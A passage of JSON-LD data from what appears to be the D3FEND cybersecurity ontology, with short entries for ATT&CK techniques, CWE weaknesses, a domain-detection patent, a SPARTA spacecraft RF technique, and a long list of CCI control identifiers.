        "@value": "https://patents.google.com/patent/US20150264070A1"
      },
      "d3f:kb-abstract": "A method and system for detecting algorithm-generated domains (AGDs) is disclosed wherein domain names requested by an internal host are categorized or classified using curated data sets, active services (e.g. Internet services), and certainty scores to match domain names to domain names or IP addresses used by command and control servers.",
      "d3f:kb-author": "James Patrick HARLACHER; Aditya Sood; Oskar Ibatullin",
      "d3f:kb-mitre-analysis": "This patent describes detecting algorithm generated domains (AGD). DNS requests and responses are analyzed by first checking whether the domain matches existing data sets that specify different types of AGDs with known characteristics, such as Evil Twin Domains, Sinkholed domains, sleeper cells, ghost domains, parked domains, and/or bulk-registered domains. In addition to comparing domains against known data sets, the following information is collected to perform analysis:\n\n* IP Information: checks for information known about the IP addresses returned in the DNS response, including the number of IP addresses returned, the registered owners of the IP addresses, or different IP addresses returned for the same domain (IP fluxing)\n* Domain Registration: examines the domain registration date, domain update date, domain expiration date, registrant identity, and authorized name servers associated with a specific domain name.\n* Domain Popularity: provides information on the popularity of a domain name.\n\nBased on analysis of these factors a score is developed; if the score is above a certain threshold, an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for detecting algorithm-generated domains",
      "rdfs:label": "Reference - Method and system for detecting algorithm-generated domains - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:T1080",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1080",
      "d3f:definition": "Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.",
      "d3f:modifies": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "Taint Shared Content",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N65f45f32a1634ea7abc82521ff870876"
        }
      ]
    },
    {
      "@id": "_:N65f45f32a1634ea7abc82521ff870876",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:WindowsNtDuplicateToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtDuplicateToken function creates a handle to a new access token that duplicates an existing token. This function can create either a primary token or an impersonation token.",
      "rdfs:label": "Windows NtDuplicateToken",
      "rdfs:seeAlso": [
        {
          "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntduplicatetoken"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICopyToken"
      }
    },
    {
      "@id": "d3f:CWE-330",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-330",
      "d3f:definition": "The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.",
      "rdfs:label": "Use of Insufficiently Random Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-1174",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1174",
      "d3f:definition": "The ASP.NET application does not use, or incorrectly uses, the model validation framework.",
      "rdfs:label": "ASP.NET Misconfiguration: Improper Model Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:ZeroClientComputer",
      "@type": "owl:Class",
      "d3f:definition": "Zero client is also referred as ultra thin client, contains no moving parts but centralizes all processing and storage to just what is running on the server. As a result, it requires no local driver to install, no patch management, and no local operating system licensing fees or updates. The device consumes very little power and is tamper-resistant and completely incapable of storing any data locally, providing a more secure endpoint.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Thin_client#Zero_client"
      },
      "rdfs:label": "Zero Client Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:ThinClientComputer"
      }
    },
    {
      "@id": "d3f:Voting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VOT",
      "d3f:definition": "Voting is another form of ensembling.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Voting",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-20",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-20",
      "d3f:definition": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Input Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-707"
        },
        {
          "@id": "_:N886d5daf08054c759db4c7f5a9319a9d"
        }
      ]
    },
    {
      "@id": "_:N886d5daf08054c759db4c7f5a9319a9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:T1624.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1624.001",
      "d3f:definition": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.",
      "rdfs:label": "Broadcast Receivers - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1624"
      },
      "skos:prefLabel": "Broadcast Receivers"
    },
    {
      "@id": "d3f:T1055.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.005",
      "d3f:definition": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Thread Local Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Nfe47177aeded4ec59e05204de45b11aa"
        }
      ]
    },
    {
      "@id": "_:Nfe47177aeded4ec59e05204de45b11aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-260",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-260",
      "d3f:definition": "The product stores a password in a configuration file that might be accessible to actors who do not know the password.",
      "rdfs:label": "Password in Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:Median",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MED",
      "d3f:definition": "The middle value that separates the higher half from the lower half of the data set. The median and the mode are the only measures of central tendency that can be used for ordinal data, in which values are ranked relative to each other but are not measured absolutely.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Median",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "rdfs:label": "AC-3"
    },
    {
      "@id": "d3f:OTSynchronizeTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Used to align timing mechanisms.",
      "rdfs:comment": "example",
      "rdfs:label": "OT Synchronize Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:OperatingSystemConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system configuration file is a file used to configure the operating system.",
      "rdfs:label": "Operating System Configuration File",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "d3f:OperatingSystem"
        },
        {
          "@id": "dbr:Configuration_file"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "d3f:OperatingSystemFile"
        }
      ],
      "skos:altLabel": "System Configuration File"
    },
    {
      "@id": "d3f:UserAccountAttachPolicyEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an IAM policy is attached to a user account.",
      "rdfs:label": "User Account Attach Policy Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N50e545732d2a40c3b4c9ba904335b0a1"
        }
      ]
    },
    {
      "@id": "_:N50e545732d2a40c3b4c9ba904335b0a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:Microcode",
      "@type": "owl:Class",
      "d3f:definition": "Microcode is a computer hardware technique that interposes a layer of organization between the CPU hardware and the programmer-visible instruction set architecture of the computer. As such, the microcode is a layer of hardware-level instructions that implement higher-level machine code instructions or internal state machine sequencing in many digital processing elements.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Microcode"
      },
      "rdfs:label": "Microcode",
      "rdfs:subClassOf": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1219.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1219.003",
      "d3f:definition": "An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment.",
      "rdfs:label": "Remote Access Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1219"
      }
    },
    {
      "@id": "d3f:IA-0004.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0004.02",
      "d3f:definition": "Threat actors may target the spacecraft’s secondary (backup) RF receive path, often a differently sourced radio, alternate antenna/feed, or cross-strapped front end that is powered or enabled under specific modes. Threat actors map when the backup comes into play (safing, antenna obscuration, maintenance, link degradation) and what command dictionaries, framing, or authentication it expects. If the backup receiver has distinct waveforms, counters, or vendor defaults, the attacker can inject traffic that is accepted only when that path is active, limiting exposure during nominal ops. Forcing conditions that enable the backup, jamming the primary, exploiting geometry, or waiting for routine tests, creates the window for first execution. The result is a foothold gained through a rarely used RF path, exploiting differences in implementation and operational cadence between primary and standby receive chains.",
      "rdfs:label": "Receiver - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0004/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0004"
      },
      "skos:prefLabel": "Receiver"
    },
    {
      "@id": "d3f:carries",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x carries y: The entity x serves as the bearer or link for information y, enabling y to be stored, transported, or communicated such that y can be recovered or interpreted from x",
      "rdfs:label": "carries",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateThread",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:CCICatalog_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ControlCorrelationIdentifierCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://public.cyber.mil/stigs/cci/"
      },
      "d3f:has-member": [
        {
          "@id": "d3f:CCI-000015_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000016_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000017_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000018_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000020_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000022_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000025_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000027_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000029_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000030_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000032_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000034_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000035_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000037_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000040_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000044_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000047_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000056_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000057_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000058_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000060_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000066_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000067_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000068_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000071_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000139_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000143_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000144_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000162_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000163_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000164_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000185_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000186_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000187_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000192_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000193_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000194_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000195_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000196_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000197_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000198_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000199_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000200_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000205_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000213_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000218_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000219_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000226_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000346_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000352_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000374_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000381_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000382_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000386_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000417_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000663_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000764_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000765_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000766_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000767_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000768_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000771_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000772_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000774_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000776_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000804_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000831_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000877_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000880_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000884_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-000888_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001009_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001019_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001067_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001069_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001082_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001083_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001084_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001085_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001086_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001087_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001089_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001090_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001092_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001094_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001096_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001100_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001109_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001111_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001115_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001117_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001118_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001124_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001125_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001127_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001128_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001133_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001144_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001145_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001146_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001147_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001150_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001166_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001169_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001170_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001178_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001185_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001199_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001200_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001210_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001211_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001233_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001237_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001239_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001242_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001262_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001297_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001305_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001310_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001350_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001352_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001356_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001368_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001372_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001373_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001374_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001376_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001377_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001399_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001400_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001401_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001403_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001404_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001405_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001414_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001424_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001425_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001426_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001427_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001428_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001436_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001452_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001453_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001454_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001493_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001494_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001495_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001496_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001499_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001555_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001556_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001557_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001574_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001589_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001619_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001632_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001662_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001668_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001677_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001682_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001683_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001684_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001685_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001686_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001695_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001744_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001749_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001762_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001764_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001767_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001774_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001811_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001812_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001813_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001855_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001858_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001936_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001937_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001941_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001953_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001954_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001957_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-001991_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002005_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002009_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002010_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002015_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002016_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002041_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002145_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002165_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002169_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002178_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002179_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002201_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002205_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002207_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002211_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002218_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002233_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002235_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002238_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002262_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002263_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002264_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002272_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002277_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002281_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002282_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002283_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002284_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002289_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002290_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002302_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002306_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002307_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002308_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002309_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002322_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002346_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002347_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002353_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002355_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002357_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002358_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002359_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002361_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002363_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002364_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002381_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002382_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002384_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002385_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002394_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002397_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002400_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002403_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002409_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002411_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002420_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002421_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002422_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002423_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002425_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002426_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002460_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002462_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002463_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002464_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002465_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002466_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002467_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002468_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002470_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002475_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002476_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002530_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002531_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002533_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002536_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002546_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002605_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002607_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002613_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002614_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002617_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002618_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002630_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002631_v2022-04-05"
        },
        {
